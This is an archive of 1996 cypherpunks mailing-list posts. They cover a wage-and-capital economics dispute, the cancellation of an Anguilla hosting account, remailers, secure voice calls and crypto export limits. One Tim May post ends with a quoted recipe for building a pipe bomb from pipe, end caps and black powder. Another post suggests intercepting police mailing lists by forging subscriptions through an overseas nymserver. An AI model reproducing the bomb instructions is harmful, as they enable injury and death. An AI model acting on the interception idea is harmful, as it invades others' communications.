	Murray Rothbard in 'the free market reader' (p. 31): "Wage rates are low in many foreign countries because capital equipment is small and technologically primitive. Unaided by much capital, worker productivity is far lower than in the United States."
	Lew Rockwell in 'the economics of liberty' (p. 26): "Wages are determined by the productivity of the individual laborer, which in turn is largely determined by the amount of capital invested per worker."
	I could go on, but I think this will suffice.

Now I will explain why the austrian economists are right.
Imagine Robinson Crusoe. In the beginning, he catches fish with his bare hands. He has no capital investment, and consequently he is not very productive. His wage will be low (he will not catch much fish). If there is more capital investment - if, for example, he has a fishing rod - he will catch more fish in less time. His productivity is higher. His wage is higher (more fish). If there is still more capital investment - if, for example, he has a boat and fishing nets - he will catch even more fish. His productivity is higher. His wage is higher. Etcetera. So, it's really not difficult to see that the Robin's standard of living depends on the amount of capital available on his island. The same goes for the rest of humanity.

Bart Croughs

	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 09:11:59 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88A7.14E3A5C0@groningen04.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote:

>Bart Croughs writes:
>> 	 But there is another axiom of economics which the
>>nationalist/socialist can use for his case against the free movement of
>> capital. This axiom states that the wages of workers depend on the
>> amount of capital invested. The more capital invested, the higher the
>> wages are.

>This must be some new axiom of economics that I had not heard of.

It's not a sin to be ignorant, but to boast about it...
I recommend you read the great libertarian /austrian economists: Murray Rothbard, Henry Hazlitt, etc.


Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 13 Aug 1996 15:05:24 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: AW: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88AF.3C1CDF00@groningen04.pop.tip.nl>
Message-ID: <199608130335.XAA17171@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bart Croughs writes:
> I would be proud if I had discovered this axiom, but alas, I haven't.
> It's an axiom that is generally accepted among austrian economists
> (Rothbard, Hazlitt, etc). I don't know who actually discovered it.

The truly hysterical part is that Tim and I are both (from what I can
tell) Austrians.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 13 Aug 1996 06:55:52 +0800
To: bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <1.5.4.32.19960812173700.002f9044@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 19:36 11/08/96 -0400, Perry E. Metzger wrote:
>
>Bart Croughs writes:
>> 	 But there is another axiom of economics which the
>> nationalist/socialist can use for his case against the free movement of
>> capital. This axiom states that the wages of workers depend on the
>> amount of capital invested. The more capital invested, the higher the
>> wages are.
>
>This must be some new axiom of economics that I had not heard of.
>
>>  If American companies are moving capital to Third World
>> countries because of the low wages in these countries, then the workers
>> in the Third World will of course be better off. But in the US, the
>> amount of capital will be lowered.
>
>????
>
>> So the American workers will be able to get other jobs, but these
>> jobs will pay less, because of the diminished amount of capital in
>> the US.
>
>This is truly one of the oddest economic theses I've seen in years.

Indeed. Bart makes a very remarkable assumption, which is that the total 
amount of capital in the fastest growing industry in human history  is constant.

As I mentioned in my note (which was a bit long by my standards, so you are
forgiven if you haven't read it) software producers are software consumers
as well. So, if the software industry grows in the world, it can only benefit
the producers in the US, who make most of the compilers and sophisticated
utilities that programmers need in order to develop software.

The danger to the US software writer comes from another direction, one which
this list is thoroughly familiar with: government policies, such
as ITAR. Gilmore,
I believe, plans to get the software written for secure Internet
routing outside the
US, to not fall foul of ITAR. As security, internet commerce and
other applications
needing crypto become a more important part of software development,
others might follow -- of course it won't hurt that the move reduces costs, but
that will not be the prime motivation.

This will not be the first industry that the US government
developed and nurtured,
only to hand on a platter to foreign competitors: CNC machine tools is an
example I am familiar with. For long, the writing was on the wall, but when the
debacle came, it was swift. If I'm not mistaken, the Japanese share in the US
market of CNC machining centers increased from 2% to 51% over a 2-year
period. The problem there, at least partly, was that government encouraged 
machine tool R&D and industry to cater to the needs of defense, rather than
the rest of us. Sounds familiar?

So, while US software isn't in any danger of losing quite that badly, as I have
explained, if the US loses revenue and capital in this sector, it will only 
have its own government to blame.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "steven ryan" <sryan@reading.com>
Date: Tue, 13 Aug 1996 16:59:19 +0800
To: cypherpunks@toad.com
Subject: NT Remailers
Message-ID: <2.2.32.19960813034344.00308bf0@reading.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Would anyone be so kind as to point me to any information on running a
remailer on Windows NT and the address for the remailer-owners mailing list?
A search of the places I expected might have this information didn't

Thanks,
 Steven
------------------------------------
Steven Ryan
Reading Access
PGP Fingerprint: E8 A2 C5 A2  7A C4 77 93  0A 1B 1D C6  B9 2F 36 9B
Finger me for my PGP public key
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 13 Aug 1996 16:23:54 +0800
To: cypherpunks@toad.com
Subject: Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <v02140b09ae3588467e34@[17.255.9.110]>
Message-ID: <6VZksD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Erik E. Fair" (Time Keeper) <fair@cesium.clock.org> writes:

> I wonder how well the imager works through mylar or gold lame' clothing (or
> other high-metal content clothing)?

Have you ever wondered why Tim May wears a protective layer of aluminum
foil on his head? (And lead foil wrapped around his balls.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 12:47:04 +0800
To: "'cypherpunks@toad.com>
Subject: AW: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <01BB88AF.3C1CDF00@groningen04.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

>At 10:31 PM 8/11/96, Bart  Croughs wrote:

>>         But there is another axiom of economics which the
>>nationalist/socialist can use for his case against the free movement of
>>capital. This axiom states that the wages of workers depend on the amount
>>of capital invested. The more capital invested, the higher the wages are.
>>If American

>I agree strongly. In my Econ 101 class, lo those many years ago, I was
>constantly reminded to "Remember the Croughs Axiom!"

I would be proud if I had discovered this axiom, but alas, I haven't. It's an axiom that is generally accepted among austrian economists (Rothbard, Hazlitt, etc). I don't know who actually discovered it.

>It is why MacDonald's workers, who work at a company which has invested
>truly vast sums of money in the capital of its outlets, pays its workers so
>much more than do the legal firms, advertising firms, etc., which have
>invested almost nothing in the capital of their facilities.

When economists say that wages depend on the amount of capital invested, they mean on a regional/national level, not on the level of individuals.
	Back to class!

Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 12:25:18 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88AF.40553180@groningen04.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain




Perry Metzger wrote:

> Bart Croughs writes:
> > 	 But there is another axiom of economics which the
> > nationalist/socialist can use for his case against the free movement of
> > capital. This axiom states that the wages of workers depend on the
> > amount of capital invested. The more capital invested, the higher the
> > wages are.

>I failed to note obvious counterexamples. Well known authors get giant
>advances for books written with manual typewriters. Minimum wage
>workers routinely operate expensive equipment. Workers doing the same
>job in different places using identical equipment that cost identical
>sums earn different salaries.

>Clearly, wages are defined by supply and demand -- not by "capital
>investment".


When economists say that wages are determined by the amount of capital invested, they mean on a regional/national level, not on the level of individuals.

Bart Croughs 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@hellspawn.Berkeley.EDU>
Date: Tue, 13 Aug 1996 15:48:07 +0800
To: cypherpunks@toad.com
Subject: Re: Spam and Eggs. (fwd)
Message-ID: <Pine.LNX.3.91.960813004421.1425E-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain



I put together a few pages regarding remailers and net spamming. Nathan 
Waddoups <nathan@metareality.com> hosts a well written site dealing with 
the larger issue of netspam, and has graciously agreed to host the 
remailer pages.




---------- Forwarded message ----------
Date: Mon, 12 Aug 1996 17:06:25 -0700 (PDT)
From: Nate Waddoups <nathan@metareality.com>
Subject: Re: Spam and Eggs. 


I just finished adding your page.  You're linked from the main spam page:

	http://www.metareality.com/~nathan/visit.cgi/html.Spam

...and your page is at this address:

	http://www.metareality.com/~nathan/visit.cgi/spam/html.Remail

Groovy.
-----------------------------------------------------------------------------  
  <sig> see http://www.metareality.com/~nathan for more of the same </sig>   
Help stop junk email!  http://www.metareality.com/~nathan/visit.cgi/html.Spam







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 12:54:06 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <01BB88B2.33BB74E0@groningen04.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta wrote:

>Indeed. Bart makes a very remarkable assumption, which is that the total 
>amount of capital in the fastest growing industry in human history  is constant.

I didn't make this assumption. When I say that when capital leaves the US, the amount of capital in the US will be lower, I mean that the amount of capital will be lower than it otherwise would have been. It will be *relatively* lower, and so the wages in the US will be *relatively* lower than when when the capital wouldn't have left the US. Of course, absolutely speaking the wages could still become higher. I thought this was so obvious that I didn't make this explicit. 


Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasa.roskar@uni-lj.si
Date: Tue, 13 Aug 1996 13:09:41 +0800
To: cypherpunks@toad.com
Subject: Anguilla story...
Message-ID: <009A6C3F.D8665B7E.21@uni-lj.si>
MIME-Version: 1.0
Content-Type: text/plain


Can someone please tell me the origin of this whole Anguilla story
that's been going around a lot for the past few days... I just
got onto the list two days ago, and I didn't catch the beginning
of it... thanks,

rok




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Tue, 13 Aug 1996 19:45:55 +0800
To: cypherpunks@toad.com
Subject: non-secure network utilities - pointers?
Message-ID: <Pine.SUN.3.91.960813010527.1025D-100000@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



What cypherpunk-approved (tm) -- that is, cryptographically strong, 
freely available, and well-implemented (reliable) -- network utilities are 
available?  I'm willing to agree to US-only license agreement iff I have 
to...

I'm looking for secure telnet, ftp, talk, etc. that I can run over a 
potentially insecure network (and their respective daemons).

Is SSL the way to go?  (If so, what's the best implementation?)  What 
about other protocols?  Is there some comprehensive {web,ftp}site 
where I can find more information on this subject?

Please reply off-list to poodge@econ.berkeley.edu

thanks,
-sq





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Justin Card <Wyntermute@postoffice.worldnet.att.net>
Date: Wed, 14 Aug 1996 16:41:08 +0800
To: cypherpunks@toad.com
Subject: Re: (Off Topic) Re: FCC_ups
In-Reply-To: <199608120538.WAA29683@dns2.noc.best.net>
Message-ID: <3210496C.5153@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


David Wagner wrote:

> The *real* challenge: how do you support sender- and recipient- anonymous
> phone calls with strong security?  Have fun.

If you're only encrypting/decrypting at each end, couldn't a key
exchange like Diffie-Hellman work?  Or is this not the "anonymous"
feature you were looking at?

-- 
Wyntermute




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Sutherland <maverick@interconnect.net>
Date: Tue, 13 Aug 1996 18:42:18 +0800
To: cypherpunks@toad.com
Subject: Free Pronto Secure Offer
Message-ID: <19960813073339140.AAA83@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 13 02:29:17 1996
Whatever happened to that free offer for ProntoSecure for members of the 
Cpunk list?  Remembered hearing something about it awhile back, but I don't 
know exactly what it is.  Thanks.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key: finger or email w/ 'send key' in subj.  http://www2.interconnect.net/maverick

iQEVAwUBMhAu3lZoKRrkPmSJAQFw1gf9GjVSbvqDnneHDc4YDE1z+L3A+ZB6GtS+
kN9kKloqQ4oKb8lzHhJoBrs0+BqaRf1+6bwPul6Eh6vf9FJ9VmifVBdC1oFcfVLZ
gqj++PfukYvTh5bZIEvzx6OMhm9V9AXM7ne8ySrDD0FfkDSI+PYC/ONsqmhej4wR
V4lfSyFm9dPCuvdD/C5YlIAhWD2BO0xUKpJjM6LtTmU+AHMC6qyjKvSv85HfIk2v
4cpHBY97iOmUQL/526D2ql0eQsZymg8ntN8Q6fXZ8AJt79zwfT3GeDG5fPg4iDEs
70LVtbqY73SqBpdRdYcTOJzrwPLJ2fLQrqgDjw+xO+kyogu70XdI5w==
=XlrN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Tue, 13 Aug 1996 21:30:32 +0800
To: cypherpunks@toad.com
Subject: Re: (Off Topic) Re: FCC_ups
In-Reply-To: <199608120538.WAA29683@dns2.noc.best.net>
Message-ID: <4upjp5$tc@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.BSF.3.91.960812153240.26183B-100000@mcfeely.bsfs.org>,
Rabid Wombat  <wombat@mcfeely.bsfs.org> wrote:
> ob crypto (for anyone who read this far): When packet switched voice 
> systems become a reality, how can secure calls be placed to any number? 
> Key exchange during call set-up? How long will this make the call set-up?

This is easy.  Just use end-to-end encryption.  No sweat.  (So what if
call setup takes a half a second to do a public key encryption?  The phone
rings for a couple of seconds before the other guy picks it up anyhow.)

Well, there's that nasty key distribution and management problem (e.g.
who certifies the millions of public keys corresponding to everyone's
phone number?), but that's not specific to voice traffic, and this is
a well-known annoying problem.


The *real* challenge: how do you support sender- and recipient- anonymous
phone calls with strong security?  Have fun.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Aug 1996 07:06:06 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla story...
Message-ID: <ae360f510002100460a6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 PM 8/13/96, Vincent Cate wrote:

>In a nut shell, taxbomber.com was on my system in Anguilla.  He was
>selling "camoflauge passports".  One David Evans of Bloomberg Business
>News wrote an article where he quoted taxbombers page saying something
>like "it is illegal to use these passports to open up bank accounts, but
>there is little chance of getting caught". I got a call from my lawyer who
>had seen the article (along with just about everyone else in Anguilla) and
>he told me that was illegal in Anguilla and I should cancle the account.
>I did and taxbomber moved to another provider in another country.
>
>1) A number of cypherpunks are dissapointed that I did not fight to my
>death to defend this guy.

I think you're overstating the case made by some of us, or, at least, by me.

What I said was that your policies need to be spelled out, and that I saw
little evidence of "fraud" in what the guy was doing. And that if you cut
off accounts (without warning, it sounds like) based on fairly flimsy (it
seems to me, and to Duncan, and to others) advice, then certain
reputational consequences are likely to follow.

By the way, from what you quote this guy as saying ("it is illegal to use
these passports to open up bank accounts, but there is little chance of
getting caught"), I _still_ see no fraud. People can make all sorts of
claims, often they throw in claims of illegality or "pirate" status just to
add a frisson of the dangerous to their marketing campaign.

Cancelling an account on such a basis is rarely wise. That "everyone else
in Anguilla" read the account may be the real reason, of course. Not that
this reason instills much confidence....

>2) If the guy did not mention where his site was, the reporter probably
>would never have mentioned Anguilla and me in the article.

Is this the real issue, that what he was doing brought bad publicity to you
and to Anguilla?

These issues need to be aired. Of course you have every right to run things
as you wish, modulo contractual arrangements you may have entered into with
your customers and your Internet providers. But we on this list have
certain ideas about what an "offshore information provider" should provide.

Contrast this case with the well-publicized cases recently where Neo-Nazi
material is being hosted on U.S. web sites. After getting a lot of
publicity, the web site providers stood firm and said they were not in the
business of removing such sites, even if they brought a lot of bad
publicity and even if they were in fact in violation of the laws of some
countries whose citizens could access the sites. I don't claim camouflage
passports = Neo-Nazi sites, but their are certainly some similarities. So,
if I opened an account on "Offshore Information Services" and placed such
materials there, and this got heavily publicized ("Anguilla a Center for
Neo-Nazi Revival!"), would my account be cancelled?

Again, I'm not saying you don't have the "right" to do so, only that you
ought to carefully consider such issues, and carefully articulate a policy
of what is acceptable and what is not acceptable, and how you will deal
with customers who have some material (or even some marketing claims) which
may conflict with your policies.

--Tim May

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 13 Aug 1996 13:43:50 +0800
To: cypherpunks@toad.com
Subject: Re: cybergangs
Message-ID: <199608130215.EAA20375@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri Vulis ranted thusly into the aether:

>Death to the Usenet Cabal! All power to the GruborBots!

Jeez, is there no place safe from Dimitri's Cabal rantings? There Is No Cabal
fnord. So there.

ObCypherpunks: It's worth noting that Dimitri's reputation capital is so devalued on Usenet that his vote wasn't accepted in the recent soc.religion.paganism CFV:

dlv@bwalk.dm.com                                             Dr. Dimitri Vulis
   ! Vote rejected by votetaker (untrusted site)

This is from Message-ID: <839564931.8926@uunet.uu.net>, btw.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 14 Aug 1996 00:20:40 +0800
To: cypherpunks@toad.com
Subject: thank god and phil...
Message-ID: <199608131125.EAA19626@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


All I can say is thank God and Phil for PGP... My next X was using the 'puter last night and opened my email folders and was rooting around... I had to "fumble" my pass phrase and finally "give up" saying that the damn PGP was broke again... we all know it don't break !! This could have cost me a fortune in divorce court !!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Aug 1996 08:20:29 +0800
To: cypherpunks@toad.com
Subject: More on "Fraud" and Anguilla
Message-ID: <ae361bb5020210044a27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've been thinking about this whole "Taxbomber" issue of "fraud." (I'm
still not completely sure whether Taxbomber lost his account at Offshore
Information Services Ltd. because:

a) what he was offering actually violated Anguillan law (was there a
determination that selling camouflage passports violates a specific
statute?)

b) what he was offering constituted fraud (to whom? His customers certainly
knew what they were buying. To potential victims in the future?)

c) he brought unwelcome attention to Anguilla in general and to Offshore
Information Services Ltd. in particular. (Vince's mention that the whole
island had read the story suggests something to this.)

d) he violated some particular clause of his service agreement with
Offshore Information Services Ltd.


>From Vince's homepage (http://online.offshore.com.ai/)

"Could You Use a Virtual Presence Offshore?

       Do you have an offshore corporation and need an offshore web site?
       If your offshore corporation does business from offshore is it tax free?
       Is your country trying to censor the Internet?
       Can talking about abortion on the net get you in trouble?
       Are they censoring information about an ex-president in your country?
       Are your political views suppressed where you live?
       Is Amway the only multi-level-marketing company allowed in your country?"

Now I read from this that Vince is encouraging "multi-level-marketing
companies" to use his service. Am I wrong on this?

Another name for this, commonly used, is "pyramid scheme." Or "Ponzi
scheme." There are many summaries of MLM on the Net. Here's one, from
http://www.best.com/~vandruff/mlm1.html :

(begin quote)

"For most MLMs, the product is really a mere diversion from the real
profit-making dynamic. To anyone familiar with MLMs, the previous
discussion
(which focused so much on the fact that MLMs are "doomed by design" to
reach market saturation and thus put the people who are legitimately trying
to sell the product into a difficult situation) may seem to miss the point.
The product or service may well be good, and it might oversaturate at some
point, but let's get serious. The product is not the incentive to join an
MLM. Otherwise people might have shown an interest in selling this
particular
product or service before in the real world. The product is the excuse to
attempt to legitimate the real money-making engine. It's "the cover."

"Intuitively, we all know what is really going on with MLMs. Just don't use
the word "pyramid"!

""You see, if you can convince 10 people that everyone needs this product
or service, even though they aren't buying similar products available in
the
market, and they can convince 10 people, and so on, that's how you make the
real money. And as long as you sell to a few people along the way, it is
all legal." Maybe. . . ."

(end quote)

Now, personally, and from a libertarian free-market free-choice
perspective, I have no problem with pyramid schemes. I think of them as
examples of evolution in action, like gambling.

But I rather suspect that setting up a pyramid scheme in the towns of
Anguilla would generate reaction by the authorities. (To be sure, certain
MLM enterprises escape prosecution in the U.S., some get closed down...I
have no idea which would be acceptable to the Anguillan authorities and
which would go too far.)

Why do I mention all this stuff? Why focus on Vince's invitation for MLMs
to set up shop on his service?

This should be clear. Operating a pyramid scheme is arguably more a
clearcut case of "fraud" than selling pieces of paper to willing buyers.

The items in Vince's list are certainly more consistent (which is good)
with what we expect "data havens" to support. I just can't square the name,
"Offshore Information Services Ltd.," (which is also good), and the list I
quoted above with Vince's recent comments about wanting "clean" businesses!
It seems from his recent comments that he wants nice, simple "widget
makers" to offer nice, simple, legal-in-all-jurisdictions "tax avoiders."

When I asked if his site would accept or tolerate "Let's kill the Queen"
screeds, he replied  "Not acceptable.  This is not the market I am after.
I don't see the profit in it."

Well, as Steve Martin used to say, "Ex-c-u-u-s-e me!" Namely, this appears
to conflict directly with two of Vince's suggestions for why his site is
attractive, namely:

      "Are they censoring information about an ex-president in your country?
       Are your political views suppressed where you live?"

Suggestions that Brits ought to rise up and kill the monarchy are of course
time-honored political expressions, common in Scotland, Ireland, Wales, and
even in parts of Merry Old England herself. This has even happened in the
past.

And a certain Iranian exile, living in Paris in the 1970s, routinely called
for the killing of the Shah. I imagine Khomeini would've had his Anguilla
account revoked. "Not acceptable.  This is not the market I am after.  I
don't see the profit in it."

I'm sorry to be so harsh to Vince and his fledgling service. But we have a
duty (to the themes of our list) to call a spade a spade. A nominal data
haven which invites customers to do the things Vince describes in his home
page, but then which cuts and runs when the heat is applied....well, this
is not a good thing.

--Tim May




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Wed, 14 Aug 1996 01:10:05 +0800
To: cypherpunks@toad.com
Subject: Re: "X-Ray Gun" for imperceptible searches
Message-ID: <2.2.32.19960813094025.006c435c@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought metal collanders on the cranium were to prevent space aliens from
reading our thoughts and controlling our minds.... Guess I'll have to come
up with a better solution... mine seems to have worked thus far, though

Charley
>
>"Erik E. Fair" (Time Keeper) <fair@cesium.clock.org> writes:
>
>> I wonder how well the imager works through mylar or gold lame' clothing (or
>> other high-metal content clothing)?
>
>Have you ever wondered why Tim May wears a protective layer of aluminum
>foil on his head? (And lead foil wrapped around his balls.)
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Tue, 13 Aug 1996 21:20:51 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Fw: Police on the Net
Message-ID: <199608130953.FAA21599@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: EALLENSMITH@ocelot.Rutgers.EDU, cypherpunks@toad.com
Date: Tue Aug 13 05:55:50 1996
If any of us find the address, please post the addresses here.....
- -----Begin Included Message ----- 

Date: Mon, 12 Aug 1996 19:08 EDT
 From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
To: cypherpunks@toad.com
Cc: 


        First, I'd be interested in knowing some of those online reporting
addresses, and how much limits they place on what can be mailed to them...
persuading these cops to deal with the improper use of another's computer
(i.e., spam) would seem to be a distinct possibility in diverting them from
other activities. Second, it would appear possible (unless they're 
encrypting
it) to intercept some of these email lists of theirs - if necessary, by
forging a subscribe to an _overseas_ nymserver that isn't too well known
(unlike, say, anon.penet.fi). That's about on the same grounds as their
mention of "know thine enemy." (It is, of course, pretty certain that
various libertarian groups are among those monitored, such as cypherpunks.)
Third, this gives additional reasons not to give out one's address to 
anyone.
What people know about me is a post office box and my old address.
        -Allen
- ---- End of forwarded message ----

Cut to save space....
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMhBRJ+J+JZd/Y4yVAQHjYgQKAiBzkv0iVGlG1wNn3QLJwR/KymkzFeej
ByxF4uLs/IuQ9Np7Y0MZ64rmO7O85z6yoL0iZUegmwfQFuoVX+A3XrN0gtMzA3YR
dyTaOS63IJ5kyBggrSt0Yx6kVT5FtAIELbb3KVC7+oqa2nsc9/DuC24S3uKsSoDm
KZ7/qnHd1nM+Mw==
=2i9v
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 14 Aug 1996 00:46:08 +0800
To: bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <2.2.32.19960813100507.00a3f8d8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 8/11/96 -0400, Perry E. Metzger wrote:
>
>I failed to note obvious counterexamples. Well known authors get giant
>advances for books written with manual typewriters. Minimum wage
>workers routinely operate expensive equipment. Workers doing the same
>job in different places using identical equipment that cost identical
>sums earn different salaries.
>
>Clearly, wages are defined by supply and demand -- not by "capital
>investment".

In the long run, employers will bid wages up to the level of discounted
value of marginal product of the labor -- the present value of the future
"price" of the increase in output ascribable to the added worker.

It never ceases to amaze me that there are people in this country who
actually believe that the average American in poorer now than in 1970.  I
can only be those who were unconscious in 1970.    

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Wed, 14 Aug 1996 05:22:07 +0800
To: spencer@luckman.com
Subject: Fw: 1024-bit keys
Message-ID: <199608131404.HAA06583@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: spencer@luckman.com, cypherpunks@toad.com
Date: Tue Aug 13 10:36:48 1996
Absent any ability to cite a chapter-and-verse for making such a statement, 
and considering the vagueness of it, I would suggest that it either be 
clarified, justified, or removed.

I would think that, in it's present form, that statement leaves Luckman in 
no small amount of jeopardy: if true, but misunderstood because of lack of 
reference, anyone violating it may seek redress against Luckman in the 
event of prosecution by some law enforcement agency. If untrue, Luckman 
could be considered equally liable for any real or perceived lost income 
because of an erroneous limitation, when it's incorrectness is discovered.

- -----Begin Included Message ----- 

Date: Mon, 12 Aug 1996 17:00:42 -0700
 From: Spencer Yuen <spencer@luckman.com> (by way of Technical Support via 
Heidi <heidi@luckman.com>)
To: merriman@shiner.amaonline.com
Cc: 

David,

to my knowledge- it's the latter. U.S. prevents Verisign from deploying 
keys
greater than 512 bits to Web servers outside the U.S.. And no, I can't
tell you the Federal Regulation, Title, Section. 

>"Also, please note that you cannot send keys longer than 512 to servers 
>outside the United States."
>
>I would like to ask for clarification on this point. Is this meant to say 
>that a server inside the United States is not allowed to use a 512+ bit 
key 
>with a client outside the U.S., or that a Web Commander server outside the 
>U.S. may not employ a key of greater than 512 bits? In either case, what 
is 
>the justification for such a statement/restriction? If a Federal 
>regulation, could you please cite the Title and Section?
>


=====================================================================
|       Spencer Yuen              |       Luckman Interactive       |
|       spencer@luckman.com       |       (213) 614-0966            |
|       Quality Assurance         |        ext. 145                 |
=====================================================================

________________________________________________________________________
Heidi Lou Bailey
(h) 213.664.8669
(w) 213.614.0966 ext. 137

The world is stinky and the world is smelly. That makes for a nice day
                              ////          
                             (0 0)          
                        **ooO*(_)*Ooo**
________________________________________________________________________

"To affect the quality of the day, that is the highest of the arts."

          *     *
        *   * *   *
  >>--- *         *  NICK-->
         *       *
           *   *
             *



- ---- End of forwarded message ----
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

